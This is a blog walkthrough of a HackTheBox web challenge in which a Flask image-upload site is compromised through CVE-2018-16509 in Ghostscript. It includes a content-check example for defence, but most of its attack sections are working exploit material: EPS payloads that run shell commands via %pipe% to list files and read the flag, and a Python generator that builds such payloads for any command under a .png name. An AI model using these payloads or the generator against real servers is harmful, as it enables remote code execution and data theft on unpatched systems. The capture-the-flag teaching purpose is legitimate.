Dear readers,
Today’s post is on a HackTheBox web challenge called Petpet Rcbee, created on 5 June 2021. It is a pretty short challenge, so this post shouldn’t be too long. Let’s dive right into it.

Files provided
The challenge provides a number of files needed to set it up locally: CSS files, image files, JavaScript files, Python files, Docker setup files, etc. You may download the files here. Note that catflag.eps, catflag.png, ls.eps, and ls.png are files I created for the exploit; you may ignore them if you are setting up the server locally.
Appearance of the website
When we first open the website, this is how it looks.

We can choose any image file (.png or .jpeg) to upload. Once the file is successfully uploaded, moving the cursor over the current .gif image on the page causes it to be refreshed. Fig 2b shows the result of uploading an image of my logo: the website now displays a GIF of a hand petting my logo.

If we try to upload other file types, there will not be any changes to the website.
Analysis
Looking at the code, we can see that the backend of the website runs on Flask. Below is the source code of main.py (located at challenge/application/main.py), which runs in the backend and shows the Flask library being used.
from flask import Flask
from application.blueprints.routes import web, api

app = Flask(__name__)
app.config.from_object('application.config.Config')

app.register_blueprint(web, url_prefix='/')
app.register_blueprint(api, url_prefix='/api')

@app.errorhandler(404)
def not_found(error):
    return {'error': 'Not Found'}, 404
If we look at util.py (located at challenge/application/util.py), we can see that only files whose extension is .png, .jpg, or .jpeg are allowed. Note that allowed_file() is given only the file name, so nothing here inspects the file content.
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])

def petpet(file):
    if not allowed_file(file.filename):
        return {'status': 'failed', 'message': 'Improper filename'}, 400
Since we cannot upload other file types, we cannot upload a malicious __init__.py, an approach sometimes used for Remote Code Execution (RCE) via file upload on a server with a Python backend. You may read more about that approach by ajinabraham.com here.
While looking through the source code, I couldn’t find any vulnerability in the application itself. Hence, I decided to try the least likely option: a known CVE in the PIL (Pillow) library that processes the uploaded images. Pillow does not render PostScript itself; for EPS files it hands the data to Ghostscript. True enough, I found this source that talks about a past CVE for PIL via Ghostscript here. The vulnerability (CVE-2018-16509) exists in Ghostscript versions before 9.24.
Looking at the Dockerfile, we can see that Ghostscript 9.23 is used, which means we can use the Proof-of-Concept (PoC) as given. Below is the part of the Dockerfile that shows v9.23 being installed.
# Install Pillow component
RUN curl -L -O https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs923/ghostscript-9.23-linux-x86_64.tgz \
    && tar -xzf ghostscript-9.23-linux-x86_64.tgz \
    && mv ghostscript-9.23-linux-x86_64/gs-923-linux-x86_64 /usr/local/bin/gs && rm -rf /tmp/ghost*
The other requirement is that Pillow actually hands our upload to Ghostscript. In util.py, the uploaded image goes through Image.open(), and Pillow chooses the decoder from the file’s content, not from its extension: a file that starts with %!PS is treated as EPS whatever its name. Image.open() itself only parses the EPS header; Ghostscript is spawned when the pixel data is loaded, which happens as soon as the image is drawn into the petpet GIF. So the upload path is vulnerable to this CVE despite the extension check.
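To make the point concrete, here is an added example (my code, not the challenge’s util.py) that puts the name-only allow-list next to a content check keyed on the same magic bytes Pillow’s decoders use. The allowed_file() body is the standard Flask pattern and is assumed to match the challenge’s unshown helper; the magic-byte table, the hardened check, and the sample uploads are constructed for this example.

```python
# Added example, not code from the challenge: why the extension allow-list
# lets a PostScript file through, and what a content check that blocks it
# looks like.  allowed_file() is the Flask-docs pattern and is assumed to
# match the challenge's (unshown) helper; everything else here is mine.
from typing import Optional

ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg"}


def allowed_file(filename: str) -> bool:
    """Name-only check (assumed reconstruction of util.py's allowed_file)."""
    return "." in filename and filename.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


# Signatures image decoders key on; the file name plays no part in this.
MAGIC = {
    "PNG": b"\x89PNG\r\n\x1a\n",
    "JPEG": b"\xff\xd8\xff",
    "EPS": b"%!PS",                      # ASCII EPS / PostScript
    "EPS_BINARY": b"\xc5\xd0\xd3\xc6",   # DOS binary EPS header
}


def sniff_format(data: bytes) -> Optional[str]:
    """Return the format the bytes will be decoded as, or None if unknown."""
    for name, magic in MAGIC.items():
        if data.startswith(magic):
            return "EPS" if name.startswith("EPS") else name
    return None


def content_matches_extension(filename: str, data: bytes) -> bool:
    """Hardened check: the extension must be allowed AND the bytes must be
    the raster format that extension claims.  A renamed EPS fails here
    before Image.open() ever sees it."""
    if not allowed_file(filename):
        return False
    ext = filename.rsplit(".", 1)[1].lower()
    expected = "PNG" if ext == "png" else "JPEG"
    return sniff_format(data) == expected


def check_upload(filename: str, data: bytes) -> dict:
    """Run both checks so the difference is visible side by side."""
    return {
        "extension_check": allowed_file(filename),
        "content_check": content_matches_extension(filename, data),
        "sniffed": sniff_format(data),
    }


# Constructed sample uploads (not real files from the challenge).
PNG_STUB = MAGIC["PNG"] + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
JPEG_STUB = MAGIC["JPEG"] + b"\xe0\x00\x10JFIF\x00"
EPS_STUB = (
    b"%!PS-Adobe-3.0 EPSF-3.0\n"
    b"%%BoundingBox: -0 -0 100 100\n"
    b"% ...rest of the %pipe% PoC from the walkthrough would follow...\n"
)

if __name__ == "__main__":
    for name, data in [("logo.png", PNG_STUB), ("logo.jpg", JPEG_STUB),
                       ("catflag.png", EPS_STUB), ("catflag.eps", EPS_STUB)]:
        print(name, check_upload(name, data))
```

A renamed catflag.png passes allowed_file() but fails content_matches_extension(), because the bytes still announce themselves as PostScript. A second, cheaper belt-and-braces check is to read img.format right after Image.open() and reject anything other than "PNG" or "JPEG" before the image is loaded; neither replaces the real fix for this challenge, which is a Ghostscript at 9.24 or later.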

Crafting payload
Based on the PoC, we can adapt the exploit. The PoC does not open an interactive shell; it sets Ghostscript’s OutputFile to a %pipe% device, which makes Ghostscript run the named command through the shell. The published PoC uses touch to create /tmp/got_rce, as shown below.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
% the EPS header and BoundingBox are what Pillow needs to accept the file and pass it to Ghostscript
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
% on Ghostscript before 9.24 the error-handling trick above escapes the -dSAFER sandbox,
% so OutputFile may be pointed at a %pipe% device, which runs the command via the shell
mark /OutputFile (%pipe%touch /tmp/got_rce) currentdevice putdeviceprops
Therefore, we can create an Encapsulated PostScript (EPS) file containing the code above, with only the piped command changed. We redirect the output of ls into /app/application/static/petpets, the directory the website serves uploaded images from (see Fig 4a and 4b), so that the result can be fetched over HTTP. You may download the exploit code for ls here.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%ls > /app/application/static/petpets/pwn.txt) currentdevice putdeviceprops


Once we have the script, we rename the EPS file from .eps to .png (the content stays EPS; only the name changes, and the name is all the allow-list checks) and upload it to the server. Move the cursor over the GIF on the main page so that it reloads. We can then view the GIF and edit the URL to fetch our pwn.txt from the same directory. Fig 4c shows the result of the ls command executed in the working directory and written to pwn.txt.

From the listing we know the flag file is in the same working directory, so we can write its content into pwn.txt using the cat command shown below. You may download the exploit code here.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat flag > /app/application/static/petpets/pwn.txt) currentdevice putdeviceprops
After changing the command, rename the file to .png again and upload it, repeating the previous step. The flag is written into pwn.txt once the file has been uploaded and processed.
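The three payload files above differ only in the command inside the %pipe% string, so here is an added helper (my code, not the challenge’s files or the author’s exploit scripts) that generates them for any command and writes each one out under a .png name, as the walkthrough does by hand. The EPS template is the CVE-2018-16509 PoC quoted above; the escaping rule, the file names and the staging directory are my additions.

```python
# Added example, not the challenge's code: generate the Ghostscript %pipe%
# payload (the PoC quoted in the walkthrough) for an arbitrary command and
# save it with a .png extension so the name-only allow-list accepts it.
# Only works against Ghostscript < 9.24 (CVE-2018-16509).
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Where the challenge serves uploaded images from (path taken from the walkthrough).
PETPETS_DIR = "/app/application/static/petpets"


def ps_escape(cmd: str) -> str:
    """Escape characters that would end or corrupt a PostScript (...) string
    literal: backslash first, then both parentheses.  Balanced parentheses
    are technically legal unescaped, but escaping them all is always safe."""
    return cmd.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")


def build_payload(cmd: str) -> bytes:
    """Return the EPS bytes that make Ghostscript run `cmd` through %pipe%."""
    lines: List[str] = [
        "%!PS-Adobe-3.0 EPSF-3.0",
        "%%BoundingBox: -0 -0 100 100",
        "userdict /setpagedevice undef",
        "save",
        "legal",
        "{ null restore } stopped { pop } if",
        "{ legal } stopped { pop } if",
        "restore",
        f"mark /OutputFile (%pipe%{ps_escape(cmd)}) currentdevice putdeviceprops",
    ]
    return ("\n".join(lines) + "\n").encode("ascii")


def write_payload(cmd: str, name: str, directory: str) -> Path:
    """Write the payload as <name>.png; the extension is all the upload filter sees."""
    path = Path(directory) / f"{name}.png"
    path.write_bytes(build_payload(cmd))
    return path


def stage(directory: Optional[str] = None) -> Dict[str, Path]:
    """Produce the three payloads used in the walkthrough in one go."""
    if directory is None:
        directory = tempfile.mkdtemp(prefix="petpet-")
    return {
        "touch": write_payload("touch /tmp/got_rce", "got_rce", directory),
        "ls": write_payload(f"ls > {PETPETS_DIR}/pwn.txt", "ls", directory),
        "catflag": write_payload(f"cat flag > {PETPETS_DIR}/pwn.txt", "catflag", directory),
    }


if __name__ == "__main__":
    for label, path in stage().items():
        print(f"{label}: {path}")
```

Upload the generated .png through the site’s form exactly as described above, then fetch pwn.txt from the petpets directory. The escaping helper matters as soon as the command itself contains parentheses or backslashes, for example `echo $(id)`, which would otherwise terminate the PostScript string early and leave Ghostscript with a syntax error instead of a pipe.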
Flag obtained
Flag: HTB{c0mfy_bzzzzz_rcb33s_v1b3s}

I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my milk tea addiction. The link is here.
What made you find the vulnerability from PIL?
The website wants us to upload an image. So I figured it might be something to do with a vulnerability in parsing the files we upload to it. Hence, I tried to find a vulnerability in PIL.
I can understand that you did not find a vulnerability at first, so you moved your attention to the third-party component (Ghostscript), and at last you found the vulnerability successfully. In other words, THE IMPORTANT POINT is to take notice of third-party components?